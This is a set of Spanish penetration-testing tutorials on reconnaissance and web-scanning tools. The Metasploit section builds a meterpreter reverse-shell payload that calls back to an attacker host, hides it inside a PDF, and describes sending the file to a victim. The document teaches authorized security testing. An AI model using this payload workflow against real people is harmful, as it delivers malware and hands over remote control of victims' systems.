Netcraft

Body

Netcraft proporciona servicios de seguridad en Internet, incluyendo servicios contra el fraude y phishing, evaluación de aplicaciones y escaneo PCI. Analiza también varios aspectos de Intenet, incluyendo el mercado de servidores web, sistemas operativos, proveedores de hosting y autoridades de certificados SSL.

Netcraft proporciona una herramienta para permite capturar información sobre las tecnologías utilizadas en un sitio web. Del mismo modo permite obtener una lista de subdominios asociados con cualquier sitio web que Netcraft conozca.

A continuación se presentan algunas consideraciones para obtener el máximo beneficio de este servicio.

Utilizar la Búsqueda

  • Solo los sitios web que han sido visitados por usuarios que utilizan la barra de herramientas de Netcrfaf al menos cinco veces en los últimos seis meses, serán mostrados en los resultado de búsqueda.
  • Solo son almacenados los nombres de host (hostname), no el contenidos de los sitios.
  • La búsqueda no es sensible a mayúsculas o minúsculas.
  • Para mejores resultados, no utilizar palabras separadas por espacio.
  • Para refinar una búsqueda que devuelve muchos sitios web, intentar limitarla mediante una búsqueda sencilla. Buscar por una palabra que describa más precisamente lo que se está buscando. El resultado de la búsqueda previa puede ser de ayuda para decidir que palabra utilizar.

Sintaxis

El programa de búsqueda puede tomar patrones conteniendo un nombre de dominio válido con los caracteres A-z, 0-9, '.', '_', '-'. El caracter que define un puerto ':', y algunos metacaracteres más;

  • * coincide con cualquier número de caracteres
  • ? coincide con un solo caracter
  • [] coincide con un conjunto de caracteres especificado; ejemplo [aeiou] corresponde con cualquier vocal
  • Todos los demás caracteres son eliminados de la cadena de búsqueda

Si se proporciona un patrón sin metacaracteres, entonces el comportamiento es como si hubiera un caracter comodín al final del patrón.

Prácticas

Ingresar a la página de Netcraft (http://searchdns.netcraft.com/). Escribir el dominio a evaluar y presionar el botón “Lookup!”. Notar como en el recuadro de búsqueda se antepuso el punto “.” antes del dominio, para forzar las coincidencias con el dominio búscado.

Los resultados serán mostrados en la parte inferior.

Buscar subdominios “www” de Perú (.PE), que contengan cuatro caracteres en el nombre de host.

Buscar sitios web, con diferentes dominios. (.com, .net. .pe, etc.)

Luego de encontrar el nombre de host requerido. Hacer clic en el campo correspondiente de la columna OS, para obtener información detallada sobre el último reinicio del sistema, El Sistema Operativo y Versión.

La información antes detallada constituye parte de toda la información obtenida del objetivo de evaluación. Para visualizar el reporte completo al hacer clic en la columna “Site Report” de los resultados de búsqueda.

Entre la información obtenida se enumera; Información sobre la red, como dirección IP, Propietario del Bloque de Red, Servidor de Nombre, Administrador de DNS, DNS Inverso, Compañía de Hosting, Dominio de Nivel Superior y País de Hosting. Además un Historial de Hosting. Tecnologías utilizadas en el Sitio en el lado del servidor y del cliente, Estadísticas Web, Codificación de Caracteres, Tipo de Documento y Uso de CSS.

Toda esta gran cantidad de información puede ser obtenida sin necesidad de enviar un solo paquete directamente al objetivo de evaluación. Este es un procedimiento muy útil en la fase donde se captura información de manera pasiva durante una Prueba de Penetración.

Referencias:

http://searchdns.netcraft.com/
http://www.netcraft.com/
http://searchdns.netcraft.com/?help=yes

Internet Archive

Body

El Archivo de Internet fue fundado para construir una librería de Internet. Entre sus propósitos se incluyen ofrecer acceso permanente a investigadores, historiadores, escolares, personas con impedimentos físicos y público en general a colecciones históricas que existen en formato digital. Este Archivo de Internet incluye textos, audios, imágenes en movimiento, y software como también páginas web archivadas.

Para una Prueba de Penetración el uso del del Archivo de Internet, permite visualizar como un sitio web ha cambiando con el transcurrir de los años. De esta manera sería factible obtener información que fue en algún momento expuesta relacionada a la red o al servidor, además de información personal.

Ingresar al sitio web del Archivo de Internet

Escribir la URL del sitio web que se desea consultar y hacer el botón “Browse History”

Los resultados serán mostrados en la forma cronológica.

Para seleccionar un año, hacer clic en el parte superior donde se muestra una cronología por años. Luego seleccionar en el calendario del año correspondiente, alguna de los fechas encerradas con un círculo de color celeste.

Anotar que en un mismo día puede contener dos o más capturas de la página web consultada. En ese caso se debe seleccionar alguna de las capturas presentadas.

Al seleccionar algunas de las capturas. Se mostrará como era la página web en un año, mes, día, hora, minuto y segundo determinado.

Tener especial cuidado cuando se accede al contenido de una sitio web archivado, dado que se podrían realizar conexiones directamente al servidor web objetivo. En un reconocimiento pasivo realizado durante una Prueba de Penetración, no se debería de interactuar directamente con el objetivo de evaluación.

Para minimizar esta posibilidad utilizar la característica incluída en los navegadores web, la cual permiten evitar la carga automática de imágenes. Para el caso de Iceweasel. “Edit -> Preferences -> Content -> Exceptions...” Añadir el dominio y luego hacer clic en el botón “Block”.

Fuentes:

https://archive.org/web/

Firebug

Body

Firebug se integra con Firefox para poner al alcance de sus dedos un gran cantidad de herramientas para desarrollo web. Con Firebug se puede editar, depurar, y vigilar CSS, HTML y JavaScript en vivo sobre cualquier página web.

Características:

  • Siempre a su servicio. Firebug está a una tecla de distancia, pero nunca se interpone en su camino. Se puede abrir Firebug en una ventana separada, o como una barra en la parte inferior del navegador. Firebug también proporciona un control fino sobre cuales sitios web estará habilitado.
  • Inspeccionar y editar HTML. Firefox facilita encontrar elementos HTML incluidos de manera profunda en la página. Una vez encontrado lo que se busca, Firebug proporciona gran información, y permite editar en vivo el HTML
  • Ajustar CSS a la perfección. La pestaña CSS expone todo lo que es necesario conocer sobre los estilos en las páginas web, y si no se desea lo que se expone, se pueden hacer cambios y verlo efectuarse inmediatamente.
  • Visualizar métricas CSS. Cuando las cajas CSS no se alinean correctamente puede ser difícil entender la razón. Firebug puede medir e ilustrar todos los desplazamiento, márgenes, bordes, rellenos, y tamaños.
  • Vigilar la actividad de red. Si las páginas demoran mucho tiempo en cargar. Esto puede ser originado escribir mucho código JavaScript, o haber olvidado comprimir las imágenes. Firebug divide todo archivo por archivo.
  • Depurar y perfilar JavaScript. Firebug incluye un poderoso depurador de JavaScript que permite pausar la ejecución el cualquier momento y mirar el estado. Si el código es un poco lento, utilizar el perfilador de JavaScript para medir el desempeño y los cuellos de botella.
  • Encontrar errores rápidamente. Cuando las cosas van mal, Firebug permite conocerlas inmediatamente y proporciona información detallada y útil sobre errores en JavaScript, CSS y XML.
  • Explorar DOM. Document Object Model es una gran jerarquía de objetos y funciones esperando a ser algo por JavaScript. Firebug permite encontrar rápidamente objetos DOM y editarlo al vuelo.
  • Ejecutar JavaScript al vuelo. La línea de comando es una de las herramientas más antiguas en la programación. Firebug proporciona una buen diseñada línea de comando para JavaScript con comodidades modernas.
  • Registro para JavaScript. Tener un depurador JavaScript es grandioso, pero algunas veces la manera más rápida de encontrar fallas es volcar tanta información como se pueda a la consola. Firebug proporciona un conjunto de funciones de registro que ayuda a obtener respuestas rápidas.
  • Solo la forma en que se guste. Utilizar Firebug proporciona muchas posibilidades para desarrollo web. Si se ha sentido que algo no está funcionado como se requería. Firebug proporciona muchas opciones para ajustarse a necesidades específicas.
  • Buscar y se encontrará. Algunas veces se conoce lo que se busca, pero no se puede ver en el panel. Utilizando la caja de búsqueda rápida en la barra de herramientas de Firebug se puede buscar dentro de los paneles de Firebug y ver los resultados resaltados a medida que se escriben.
  • Cookies. Firebug permite ver y manejar cookies en el navegador. Se puede denegar cookies para sitios específicos, filtrar cookies, crear nuevas cookies y borrar las existentes. También se puede dividir en el depurador cuando una cookie específica cambia su valor y ver la línea del script que causa el cambio.

Iniciar Firefox y hacer clic en el ícono de Firebug ubicado en la barra inferior de Firefox.

Ingresar al objetivo de evaluación.

La información obtenida por Firebug está divida en diversas pestañas.

Hacer clic en la pestaña “Net”. Para vigilar el tráfico de red generado al visitar la aplicación web objetivo.

La manera mas sencilla de inspeccionar un elemento con Firefox; para esta práctica el recuadro del campo “Password”; es hacer clic derecho sobre el elemento y luego seleccionar la opción “Inspect Element with Firebug”.

Firebug mostrará el HTML correspondiente al elemento en inspección.

Para propósitos de la práctica, se modificará el valor asignado a “type= password” por “type=text”, los cual causará que la contraseña escrita en el campo “Password” del formulario sea mostrada como un texto normal.

Fuentes:

http://getfirebug.com/

Nikto2

Body

Nikto es un escaner Open Source para el servidor web, el cual realizar pruebas muy completas sobre diversos asuntos contra servidores web, incluyendo más de 6700 archivos/CGIs potencialmente peligrosos, verificación de versiones desactualizadas sobre más de 1250 servidores y problemas específicos de versión en más de 270 servidores. También verifica temas de configuración en el servidor tal como la presencia de varios archivos index, opciones HTTP del servidor, e intentará identificar servidores web y software instalado. Los temas de escaneo y plugins son frecuentemente actualizados de manera automática.

Nikto no fue diseñado como una herramienta excesivamente cautelosa. Evaluará el servidor web en el tiempo más rápido posible, siendo bastante obvio en los archivos de registro (log files). Sin embargo soporta los métodos de LibWhisker anti IDS (Intrusion Detection System) en caso se desee intentarlo (o evaluar el sistema IDS).

Cada prueba no es un problema de seguridad, aunque la mayoría lo son. Existen algunos temas que son verificaciones de tipo “solo información” para cosas que podrían no tener una falla de seguridad, pero que el webmaster o ingeniero podría ignorar de su presencia en el servidor web. Estos temas son usualmente marcados apropiadamente en la información presentada. Existen también algunas verificaciones para temas desconocidos los cuales han sido vistos en los archivos de registro (log files).

Características

A continuación se presentan las principales características de Nikto. Para una lista completa y detallada revisar la documentación.

  • Soporte SSL
  • Soporte completo para proxy HTTP
  • Verifica componentes desactualizados del servidor
  • Guarda reportes en texto plano, XML, HTML, NBE o CSV
  • Plantilla para personalizar fácilmente reportes
  • Escanea varios puertos de un servidor, o varios servidores mediante un archivo de entrada (incluyendo uno de nmap)
  • Técnicas de codificación IDS de LibWhisker
  • Fácil actualización mediante línea de comandos
  • Identifica el software instalado mediante cabeceras, favicons y archivos
  • Autenticación con Basic o NTLM
  • Adivinación de subdominios
  • Enumeración de nombres de usuario Apache y cgiwrap
  • Técnicas de mutación para “pescar” contenido de los servidores web
  • Afinación de escaneo para incluir o excluir clases completas de verificaciones de vulnerabilidad
  • Adivinación de credenciales para áreas con autenticación (incluyendo varios combos por defecto de id/pw)
  • La adivinación de autorización maneja cualquier directorio, no solo el directorio raíz
  • Mejora de la reducción de falsos positivos mediante varios métodos: cabeceras, contenido de página, y hashing de contenido
  • Reporta cabeceras “inusuales” vistas
  • Estado interactivo, pausa y cambia las configuraciones de verbosidad
  • Guarda las solicitudes y respuestas completas para los pruebas positivas
  • Reenvía solicitudes positivas guardadas
  • Tiempo de ejecución máxima por objetivo
  • Pausar automáticamente en un momento especificado
  • Verificaciones de sitios “parqueados” comunes
  • Registro hacia Metasploit Framework
  • Exhaustiva documentación

Actualizar nikto utilizando la opción “update”.

$ nikto -update

Definir la dirección IP y puerto del objetivo para realizar un escaneo sencillo.

$ nikto -host 192.168.0.17 -port 80

Anotar que en los resultados mostrados por este escaneo, no se exponen vulnerabilidades como XSS, SQL Injection, RFI u otros. Se detalla información de las tecnologías utilizadas en el servidor web objetivo, así mismo directorios o archivos que pueden revelar o contener información de utilidad para un atacante malicioso.

Nikto permite definir un directorio para realizar las pruebas, es decir este valor (nombre del directorio) precederá a todas las solicitudes.

$ nikto -host 192.168.0.27 -port 80 -root/wordpress/

En los resultados de este escaneo se muestra una vulnerabilidad RFI (Remote File Inclusion) en la versión de Wordpress instalada en el objetivo, con Código OSDVB (Open Sourced Vulnerability Database) 5292.

Al verificar manualmente esta vulnerabilidad, es factible explotarla y utilizar una webshell para controlar el objetivo.

Fuentes:

http://cirt.net/Nikto2
http://cirt.net/nikto2-docs/
http://sourceforge.net/projects/whisker/
http://osvdb.org/

PW-Inspector

Body

PW-Inspector es una herramienta que lee contraseñas e imprime aquellas que cumplen con ciertos criterios. El código de retorno es el número de contraseñas válidas encontradas, en caso no se encuentre ninguna este código es 0.

Su uso en temas de seguridad es verificar las contraseñas, si se retorna un 0 la elección de la contraseña es rechazada.

Si uso para temas de Hacking Ético implican filtrar un archivo conteniendo un diccionario, con los criterios requeridos para las contraseñas.

La ayuda referente a la sintaxis de uso y opciones, son mostradas ejecutando el comando.

# pw-inspector

Para realizar las siguientes prácticas se utilizará el archivo de nombre “password.lst”, el cual se incluye con la herramienta John The Ripper.

Mostrar únicamente las cadenas contenidas en el archivo constituidas por una o más letras minúsculas.

# pw-inspector -i /usr/share/john/password.lst -l

Mostrar únicamente las cadenas contenidas en el archivo constituidas por una o más letras mayúsculas

# pw-inspector -i /usr/share/john/password.lst -u

Mostrar únicamente las cadenas contenidas en el archivo constituidas por uno o más números.

# pw-inspector -i /usr/share/john/password.lst -n

Mostrar únicamente las cadenas contenidas en el archivo constituidas por caracteres imprimibles (los cuales no sean caracteres minúsculas, mayúsculas ni números.)

# pw-inspector -i /usr/share/john/password.lst -p

Existe un parámetro adicional “-s”, el cual filtra por caracteres especiales, los cuales no están incluidos en las categorías anteriores.

Es factible definir criterios adicionales, como la longitud mínima y máxima de la cadena. Además de definir el número de conjuntos requeridos. (caracteres minúsculas, mayúsculas y números).

Mostrar únicamente las cadenas contenidas en el archivo con una longitud mínima de 10 caracteres.

# pw-inspector -i /usr/share/john/password.lst -m10

Mostrar únicamente las cadenas contenidas en el archivo con una longitud máxima de 3 caracteres.

# pw-inspector -i /usr/share/john/password.lst -M3

La combinación de todo lo antes expuesto incrementa el poder de pw-inspector.

Mostrar todas las cadenas que tengan un tamaño mínimo de 6 caracteres y un tamaño máximo de 8 caracteres, además de contener al menos una letra minúscula y un número.

# pw-inspector -i /usr/share/john/password.lst -m6 -M8 -l -n

Mostrar todas las cadenas que tengan un tamaño mínimo de 4 caracteres, además de contener al menos una letra minúscula, una letra mayúscula y un número.

# pw-inspector -i /usr/share/john/password.lst -m4 -l -n -u

La opción “-c” define el número mínimo de conjuntos requeridos. Por defecto son todos los definidos.

El siguiente comando utiliza la opción “-c” para indicar el cumplimiento mínimo de dos criterios de los tres definidos . Es decir, deben mostrarse las cadenas que cumplan el criterio de tener como mínimo una letra minúscula y un número, o una letra minúscula y una letra mayúscula, o una letra minúscula y un número, entre otras combinaciones. Se podrían también mostrar cadenas que cumplan los tres criterios, letras minúsculas, letras mayúsculas y números.

# pw-inspector -i /usr/share/john/password.lst -m5 -M5 -c 2 -l -n -u

Fuentes:

http://manpages.ubuntu.com/manpages/precise/man1/pw-inspector.1.html
http://www.thc.org/

Incrustar una Carga en un archivo PDF existente

Body

Metasploit Framework es la más poderosa de las herramientas para auditoría disponible libremente para profesionales en seguridad. Cuenta con una amplia cantidad de exploits y un completo entorno para el desarrollo de los mismos.

Metasploit Framework tiene el módulo (exploit/windows/fileformat/adobe_pdf_embedded_exe), el cual incrusta una Carga (payload) dentro un archivo PDF existente. El archivo PDF resultante puede ser enviado al objetivo como parte de un ataque de ingeniería social.

Iniciar Metasploit Framwork y utilizar el comando “search” para encontrar el módulo.

msf > search adobe_pdf

Utilizar el comando “show options” para visualizar las opciones del módulo.

msf > show options

La opción “EXENAME” corresponde a la Carga (Payload) que será incrustada en el archivo PDF. Por esta razón se procede a crear una Carga con Metasploit Framework.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=7777 X > /tmp/divertido.exe

De regreso a la consola de Metasploit Framework, se definen las opciones restantes, como FILENAME la cual corresponde al nombre del archivo resultante; es decir la combinación de la Carga y el archivo PDF existente. Y la opción INFILENAME la cual define el archivo PDF existente donde se incrustará la Carga.

Escribir el comando “run” para generar el archivo de nombre de nombre “Reporte.pdf”. Este archivo debe ser enviado al objetivo o victima utilizando cualquier mecanismo.

Para manejar la conexión entrante generada desde el objetivo, se requiere definir una Manejador (Handler). La opciones definidas deben las mismas que las utilizadas al momento de crear la Carga (Payload) con el comando msfpayload.

msf > use exploit/multi/handler

Cuando el objetivo visualice el archivo PDF, se apertura una nueva ventana con un mensaje que podría ser obviado por personas con poca conciencia en temas de seguridad, o sencillamente debido a 5 segundos de distracción.

Si la victima hace clic en el botón “Open”, esta visualizará el documento PDF Malicioso sin generar “sospecha”, mientras que el atacante obtiene control remoto de su sistema.

Fuentes:

http://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_e…
http://www.exploit-db.com/exploits/16671/
http://www.rapid7.com/products/metasploit/download.jsp

Instalación de Wapiti

Body

Wapiti permite auditar la seguridad de las aplicaciones web. Realiza escaneos de tipo Caja Negra “Black-box”, es decir no estudia el código fuente de la aplicación, pero escaneará las páginas webs de la aplicación web desplegada, buscar scripts y formularios donde se pueda inyectar datos. Una vez que obtiene esta lista, Wapiti actúa como un “fuzzer”, inyectando cargas “payloads” para ver si el script es vulnerable.

Wapiti puede detectar vulnerabilidades de Exposición de Archivos, Inyección a Base de Datos, XSS, Detección de Ejecución de Comandos, Inyección CRFL, XXE. Utiliza archivos conocidos probablemente peligrosos, Configuraciones débiles del archivo .htaccess que pueden ser eludidos. Presencia de archivos de respaldo proporcionando información sensible.

Wapiti soporta métodos HTTP GET y POST para los ataques.
También soporta multipartes y puede inyectar cargas (payloads) en nombre de archivo (subir).
Muestra una advertencia cuando se encuentra una anomalía (por ejemplo errores 500 y tiempos de espera).
Hace la diferencia entre vulnerabilidades XSS permanentes y reflejadas.

Características Generales:

  • Genera reportes de vulnerabilidades en diferentes formatos (HTML, XML, JSON, TXT...)
  • Puede suspender y resumir un escaneo o ataque
  • Puede dar colores en la terminal para resaltar vulnerabilidades
  • Diferente niveles de verbosidad
  • Manera rápida y sencilla para activar/desactivar módulos de ataque
  • Añadir una carga (payload) puede ser tan sencillo como añadir una línea de texto.

Instalación:

No es necesario “instalar” el software en el sistema para hacerlo trabajar. Si se tienen todos los requisitos en el sistema, solo se debe proceder a extraer el archivo y ejecutar el comando Wapiti ubicado en la carpeta /bin/. El comando a ejecutar podría ser alguno de los siguientes:

./bin/wapiti
python bin/wapiti

Carpetas y archivos extraídos del archivo conteniendo la herramienta Wapiti.

Si se desea instalar Wapiti en el Sistema, ejecutar el script de nombre “setup.py” con el siguiente comando:

$ sudo python setup.py install

Este script copiará las librerías wapiti (wapitiCore) en la instalación de Python y colocará los ejecutables en el directorio /bin/ del sistema.

Para ejecutar Wapiti lo mínimo que se requiere es definir la URL de la aplicación web Objetivo.

$ python bin/wapiti http://192.168.0.27/tikiwiki/ -b folder

La opción “-b folder” define el alcance del escaneo, el parámetro “folder” se utilizar para analizar únicamente la página dada como la URL raíz.

Fuentes:

http://wapiti.sourceforge.net/
http://wapiti.sourceforge.net/INSTALL

Burp Suite

Body

Burp Suite es una plataforma integrada para realizar evaluaciones de seguridad a aplicaciones web. Esta diseñada para apoyar la metodología de una evaluación manual, y proporciona un completo control sobre las acciones a realizar, además de un análisis profundo de los resultados. Burp Suite contiene varias herramientas que trabajan juntas para realizar virtualmente cualquier tarea que pueda ser encontrada en las evaluaciones. Puede automatizar todo tipo de tareas de manera personalizada, y permite combinar técnicas manuales y automáticas para hacer las pruebas más rápidas, más confiables y mas divertidas.

Burp Suite contiene los siguientes componentes claves:

  • Un Proxy de interceptación, el cual permite inspeccionar y modificar el tráfico entre el navegador y la aplicación objetivo
  • Un Spider de conocimiento de la aplicación, para recorrer contenidos y funcionalidades
  • Un Escaner avanzado para la aplicación web, para automatizar la detección de varios tipos de vulnerabilidades
  • Una herramienta de Repetición, para manipular y reenviar solicitudes individuales
  • Una herramienta de Secuencia, para evaluar la aleatoriedad de los tokens de sesión
  • Ampliable, permite escribir fácilmente plugins propios, para realizar tareas altamente personalizadas y complejas dentro de Burp Suite

Mencionar que Burp Suite tiene una Edición Libre y una Edición Profesional. La Edición Libre no tiene todas las funcionalidades en comparación a la Edición Profesional. Además su costo es de $299 dólares por usuario al año.

Al iniciar Burp se presentará su interfaz gráfica.

Utilizar la Extensión de Firefox “FoxyProxy” para configurar Burp Suite como proxy.

Al ingresar a la aplicación objetivo se coloreará la pestaña “Proxy” de Burp Suite. Esto significa que el modo de Interceptación está activado por defecto. Hacer clic en la pestaña “proxy”, para luego hacer clic en el botón “Intercept is on”. De esta manera se desactivará la interceptación.

Hacer clic en la pestaña “Target” para visualizar el mapa del sitio que Burp Suite ha capturado hasta el momento.

Al hacer clic en la pestaña “Request” ubicada en el panel inferior derecho de Burp Suite, se visualiza la solicitud enviada al servidor. Esta solicitud puede ser visualizada en Bruto (Raw), visualizar solo las cabeceras o visualizar el contenido en Hexadecimal.

Al hacer clic en la pestaña “Response” ubicada en el panel inferior derecho de Burp Suite, se visualiza la respuesta devuelta por la aplicación web. Esta respuesta puede ser visualizada en Bruto (Raw), visualizar solo las cabeceras, visualizar el contenido en Hexadecimal, en HTML, o “Render”, es decir tal y como sería visualizado en un navegador web.

Fuentes:

http://portswigger.net/burp/
http://portswigger.net/burp/help/

Instalación de CAINE 5.0

Body

CAINE (Computer Aided Investigative Enviroment) o por su traducción al español “Entorno de Investigación Asistido por Computadora” es una distribución GNU/Linux creado como un proyecto de Forense Digital. El manejador actual del proyecto es Nanni Bassetti.

CAINE ofrece un entorno forense completo que está organizado para integrar herramientas de software existentes como módulos y para proporcionar una interfaz gráfica amigable. Los principales objetivos en el diseño de CAINE permiten garantizar lo siguiente:

  • Un entorno interoperable que apoye al investigador digital durante las cuatro fases de la investigación digital
  • Una interfaz gráfica amigable
  • Herramientas amigables para el usuario

El procedimiento de instalación se describe continuación.

Seleccionar la opción “Boot Live system” para iniciar el sistema en vivo . La segunda opción permite iniciar el sistema en modo gráfico seguro. La tercera opción permite iniciar el sistema en modo texto, con el usuario y contraseña “caine”. La cuarta opción permite iniciar el sistema en modo de depuración.

Al completar el proceso de carga de la opción seleccionada, se mostrará el escritorio de CAINE.

Antes de iniciar el proceso de instalación hacer clic en “MENU -> Preferences -> Monitors” para modificar la resolución de monitor.

Para iniciar el proceso de instalación hacer clic en el ícono “Systemback (installer)”, ubicado en el escritorio. Se presentará una nueva ventana, donde se deben ingresar los datos solicitados para luego hacer clic en el botón “Next”.

Definir las particiones. En esta práctica se ha definido dos particiones, una partición SWAP en /dev/sda1 y una partición “/” en /dev/sda2. Hacer clic en el botón “Next”, para guardar esta configuración y continuar con el siguiente procedimiento.

Se presentará una nueva ventana consultando si se desea Instalar el sistema utilizando el punto de restauración “Live image”. Presionar el botón “Start”.

La instalación del sistema se está realizando. El tiempo demandado por este proceso, depende de criterios como la configuración técnica del sistema.

La instalación del sistema ha culminado satisfactoriamente.

Al reiniciar el sistema, se solicitará ingresar las credenciales del usuario creado durante el proceso de instalación.

Ya se tiene instalado correctamente CAINE en su versión 5.0. Si se tiene disponible una conexión a Internet, se sugiere realizar la actualización del software.

Fuentes:

http://www.caine-live.net/
http://www.caine-live.net/page5/page5.html

DNSenum

Body

El propósito de DNSenum es capturar tanta información como sea posible sobre un dominio. El programa actualmente realiza las siguiente operaciones.

  1. Obtener la dirección del host (Registro A)
  2. Obtener los servidores de nombre
  3. Obtener el registro MX
  4. Realizar consultas axfr sobre los servidores de nombre y obtener la versión de Bind.
  5. Obtener nombres y subdominios adicionales mediante google (consulta de google como “allinurl: -www site:dominio”)
  6. Fuerza Bruta a subdominios desde un archivo, también puede realizar recursividad sobre subdominios que tienen registros NS.
  7. Calcula los rangos de redes de dominio de clase C y realiza una consulta whois sobre ellos.
  8. Realiza consultas inversas sobre los rangos de red ( Clase C o/y whois a los rangos de red)
  9. Escribir al archivo domain_ips.txt bloques de IP.

Instalación

La instalación manual de DNSenum en Kali Linux se puede realizar de la siguiente manera.

Instalar los módulos de Perl ausentes. Primero se instala cpanminus como root.

# apt-get install cpanminus

Luego se ejecuta:

# cpanm String::Random

Proceder a descargar DNSenum desde Github

# git clone https://github.com/fwaeytens/dnsenum.git

Su uso más sencillo requiere especificar un servidor DNS con la opción “--dnsserver”, el cual será utilizado paras realizar las consultas A, NS, MX y AXFR

# perl dnsenum.pl --dnsserver [Servidor DNS] [Dominio]

DNSenum permite utilizar el motor de búsqueda Google para realizar un “raspado” de los resultados y obtener una lista de subdominios. La opción “-p” define el número de páginas buscadas en Google que se procesarán, por defecto serán 5 páginas, La opción “-s” define el número máximo de subdominios que serán extraídos de Google, por defecto son 15.

# perl dnsenum.pl --dnsserver [Servidor DNS] [Dominio] -p 10 -s 50

Los resultados de este procedimiento no han sido fructiferos, según DNSenum esto puede ser originado porque Google está bloqueando las consultas.

Para realizar una ataque por Fuerza Bruta se requiere definir un archivo utilizando la opción “-f”, DNSenum incluye un archivo de nombre "dns.txt", el cual incluye un listado de “subdominios” cuya existencia se verificará

# perl dnsenum.pl -f dns.txt --dnsserver [Servidor DNS] [Dominio]

Utilizando un ataque por fuerza bruta se han obtenido dos nuevos subdominios, mail y www. Los cuales, dependiendo del contrato, podrían ser incluídos dentro del alcance de nuestra Prueba de Penetración. Finalizado el ataque por fuerza bruta, se realizará un reconocimiento a los rangos de red correspondientes a la clase C, para luego realizar una consulta inversa sobre 512 direcciones IP.

Fuentes:

http://code.google.com/p/dnsenum/
http://code.google.com/p/dnsenum/wiki/Installation